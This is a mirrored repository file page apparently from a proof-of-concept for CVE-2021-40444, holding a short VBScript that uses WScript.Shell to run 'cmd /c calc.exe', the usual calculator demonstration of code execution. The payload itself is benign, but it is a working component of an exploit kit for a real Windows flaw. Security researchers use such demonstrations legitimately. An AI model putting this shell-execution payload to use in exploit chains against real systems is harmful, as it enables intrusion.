mirror of
https://github.com/klezVirus/CVE-2021-40444.git
synced 2024-11-15 02:17:54 +00:00
9 lines
143 B
Text
9 lines
143 B
Text
|
Function Calc()
|
||
|
Dim wsh
|
||
|
Set wsh = CreateObject("Wscript.Shell")
|
||
|
wsh.run "cmd /c calc.exe"
|
||
|
Set wsh = Nothing
|
||
|
End Function
|
||
|
|
||
|
Calc
|